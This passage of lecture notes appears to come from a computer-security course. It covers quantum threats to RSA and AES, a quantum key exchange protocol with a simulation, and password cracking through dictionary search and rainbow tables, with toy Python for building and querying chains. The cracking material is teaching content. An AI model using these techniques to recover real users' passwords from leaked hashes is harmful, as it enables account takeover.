• Grover's algorithm =⇒ quantum computers can solve these problems in O(2^(n/2)),
a dramatic improvement but still super-polynomial
• there exist some such problems which quantum computers can solve efficiently
– factoring (via Shor’s algorithm)
– discrete log problem (via a variant of Shor’s algorithm)

Implications for crypto

• in a world with large quantum computers, protocols that rely on the hardness of factoring and the discrete log problem are useless (including RSA, Diffie-Hellman, etc.)
• most symmetric crypto (e.g. AES) is not efficiently breakable; the best known quantum attack is Grover's algorithm
• Grover's algorithm implies that we can break AES with a 128-bit key in 2^{128/2} = 2^64 steps
• Solution: double the key size (the arithmetic is worked out after this list)
• are there public-key algorithms that are not breakable quickly by quantum computers? probably
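The arithmetic behind "double the key size," worked out under the assumption that the only quantum speedup available against exhaustive key search is Grover's quadratic one:

```latex
% Grover searches a k-bit keyspace in about 2^{k/2} steps:
2^{128/2} = 2^{64} \quad \text{(AES-128 under Grover)}
\qquad
2^{256/2} = 2^{128} \quad \text{(AES-256 under Grover, i.e. after doubling the key size)}
```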

Quantum Key Exchange

• Threat model:
– quantum channel between Alice and Bob
– assume there exists an eavesdropper who a) can measure but b) cannot
modify qubits in the channel without measuring
• 1) before sending each bit, Alice flips a coin; if heads, she applies R to the qubit before sending it
• 2) when Bob receives a qubit, he flips a coin; if heads, he applies R^{-1} before measuring

• 3) Alice and Bob publish their coin flips and discard any bits where the flips don't match
• 4) Alice picks half of the remaining bits at random, and Alice and Bob publish their values for these bits
– if any fail to match, abort the protocol (an eavesdropper was measuring)
– otherwise, use the remaining bits as a shared secret
• The adversary has a decision: which bits, if any, should he measure?
• If the adversary measures a bit:
– if Alice flipped tails, he gets the correct value
– if Alice flipped heads, he gets the correct value with probability 50%
– if Alice flipped heads and Bob applied R^{-1}, then there is a 50% chance Bob's bit won't match Alice's
– overall, for a measured bit there is a 25% chance that Bob's value won't match Alice's (the chance that Alice flipped heads times the chance the bit collapsed to the wrong value during the adversary's measurement); the simulation sketch after this list illustrates this 25% mismatch rate
• The adversary might also try to apply R^{-1} before measuring; in this case, he runs the risk of disrupting bits that were in a classical state to begin with
• Problem (for the adversary): he needs to guess Alice's coin flip to measure the bit without disturbing it
– if the adversary disturbs more than 4 of the check bits, he will get caught with greater than 50% probability
– if the adversary measures a lot, it is likely that the integrity check will fail
– if the adversary doesn't measure a lot, Alice and Bob will have a larger shared secret
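A minimal Monte-Carlo sketch of the exchange above, assuming R is the 45° rotation from the quantum-computing notes; the helper names (one_round, measure, basis) are illustrative. With an eavesdropper who measures every qubit, roughly 25% of the kept bits disagree, which is exactly what the published check bits detect:

```python
import numpy as np

rng = np.random.default_rng()

R = np.array([[1.0, -1.0], [1.0, 1.0]]) / np.sqrt(2)   # assumed 45-degree rotation
R_inv = R.T                                            # inverse of a real rotation

def basis(bit):
    return np.array([1.0, 0.0]) if bit == 0 else np.array([0.0, 1.0])

def measure(state):
    # collapse to 0 or 1 with probabilities |x|^2, |y|^2
    return int(rng.choice(2, p=np.abs(state) ** 2))

def one_round(eavesdrop):
    bit = int(rng.integers(2))              # Alice's classical bit
    state = basis(bit)
    alice_heads = bool(rng.integers(2))
    if alice_heads:                         # step 1: maybe rotate before sending
        state = R @ state
    if eavesdrop:                           # Eve measures, collapsing the qubit
        state = basis(measure(state))
    bob_heads = bool(rng.integers(2))
    if bob_heads:                           # step 2: maybe un-rotate before measuring
        state = R_inv @ state
    return bit, alice_heads, bob_heads, measure(state)

# Step 3: keep only rounds where the coin flips match, then compare values.
rounds = [one_round(eavesdrop=True) for _ in range(4000)]
kept = [(b, r) for b, ah, bh, r in rounds if ah == bh]
mismatch = sum(b != r for b, r in kept) / len(kept)
print(f"mismatch rate among kept bits: {mismatch:.2f}")  # about 0.25 with an eavesdropper
```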

24 Password Cracking

Elementary Methods

First, try to define and reduce the search space for a brute-force search:
• all short strings
• combinations of dictionary words
• dictionary words + common modifications (special characters, exclamation point
at the end)
• leaked passwords from past breaches
• dictionary words and one-character modifications
Properties of brute-force search:
• Time requirement: ∼ |D|, where |D| is the size (number of entries) of the dictionary
• Space: ∼ 1
• Can speed up the process by pre-computing hashes of all possible passwords in
search space:
– Fill hash table: can then find x ∈ D given H(x)
– Time to build: ∼ |D|
– Space: ∼ |D|
– Time to recover: ∼ 1
• What we want: a smaller data structure, but still fast lookup =⇒ Rainbow Tables (a sketch of the two baseline approaches above follows this list)
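A minimal sketch of the two baseline approaches; the dictionary and function names are illustrative, and real password stores would typically use a slower, salted hash rather than plain SHA-256:

```python
import hashlib

def H(pw: str) -> str:
    return hashlib.sha256(pw.encode()).hexdigest()

# Brute force: ~|D| time per target hash, ~constant space.
def brute_force(target: str, dictionary: list):
    for pw in dictionary:
        if H(pw) == target:
            return pw
    return None

# Precomputation: ~|D| time and ~|D| space once, then ~constant time per target.
def build_table(dictionary: list) -> dict:
    return {H(pw): pw for pw in dictionary}

dictionary = ["password", "letmein", "hunter2", "password1!"]
table = build_table(dictionary)
print(brute_force(H("hunter2"), dictionary))   # -> hunter2
print(table.get(H("letmein")))                 # -> letmein
```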

Rainbow Tables

Define "reduction functions" R_0, R_1, ..., R_{k−1}. The only requirement of these functions is that they map the output of a hash function to a string in your dictionary. The functions "reduce" since the number of possible hash outputs might be very large (e.g. 2^256), while the dictionary is generally much smaller.

Method: Generate chains


• Start with a_0, a random dictionary word. Then, compute H(a_0). Next, apply R_0 to H(a_0) to generate the next word, a_1.
• Complete chain: a_0 →(H) H(a_0) →(R_0) a_1 →(H) ··· →(R_{k−2}) a_{k−1} →(H) H(a_{k−1}) →(R_{k−1}) a_k
• Build chains with a variety of starting values b_0, c_0, etc.
• since the output of a cryptographic hash function is essentially pseudorandom, so is the distribution of words that appear in a chain
• for each chain, remember only the pair (a_0, a_k), (b_0, b_k), etc.
• there are about ∼ |D|/k chains, so the storage requirement is ∼ 2|D|/k
• k is a parameter we can adjust to control how much we shrink storage (a chain-generation sketch follows this list)
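A minimal sketch of chain generation, using a toy reduction function R_i that simply indexes into the dictionary (any function mapping digests back into the dictionary would do; H, R, and build_chains are illustrative names, not from the notes):

```python
import hashlib

def H(word: str) -> str:
    return hashlib.sha256(word.encode()).hexdigest()

def R(i: int, digest: str, dictionary: list) -> str:
    # Toy reduction function R_i: map a digest back into the dictionary,
    # parameterized by the link index i so each step uses a different R_i.
    return dictionary[(int(digest, 16) + i) % len(dictionary)]

def build_chains(dictionary: list, starts: list, k: int) -> dict:
    """Build chains of length k; store only endpoint a_k -> start a_0."""
    table = {}
    for a0 in starts:
        word = a0
        for i in range(k):
            word = R(i, H(word), dictionary)
        table[word] = a0
    return table
```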


You can use a rainbow table to recover x ∈ D given H(x) efficiently.
• 1) Figure out which chain H(x) appears in: guess the position j of x within a chain, apply R_j, H, R_{j+1}, ..., R_{k−1} to roll forward to a candidate endpoint, and check that endpoint against the stored (start, endpoint) pairs
• 2) Walk that chain from its stored starting word; we will encounter x → H(x) along the way
• Step 1: ∼ k^2 time (k position guesses, each requiring up to k hash/reduce steps)
• Step 2: ∼ k time (a lookup sketch in code follows)
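A matching lookup sketch, continuing the toy H, R, and build_chains helpers above; chain merges and false alarms are handled only by moving on to the next position guess:

```python
def lookup(h: str, table: dict, dictionary: list, k: int):
    # Step 1 (~k^2 work): for each guessed position j of x in a chain, roll
    # forward from H(x) to a candidate endpoint and check the stored endpoints.
    for j in range(k):
        word = R(j, h, dictionary)
        for i in range(j + 1, k):
            word = R(i, H(word), dictionary)
        if word in table:
            # Step 2 (~k work): walk the matching chain from its start until
            # we hit the word whose hash is h.
            cand = table[word]
            for i in range(k):
                if H(cand) == h:
                    return cand
                cand = R(i, H(cand), dictionary)
    return None   # not covered by the table

# Example with a tiny, hypothetical dictionary:
words = ["password", "letmein", "hunter2", "qwerty", "princeton"]
table = build_chains(words, starts=["password", "qwerty"], k=4)
target = R(0, H("password"), words)       # a word that appears in the first chain
print(lookup(H(target), table, words, k=4))
# Should print target; with such a tiny dictionary, chains can merge and a lookup may occasionally miss.
```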
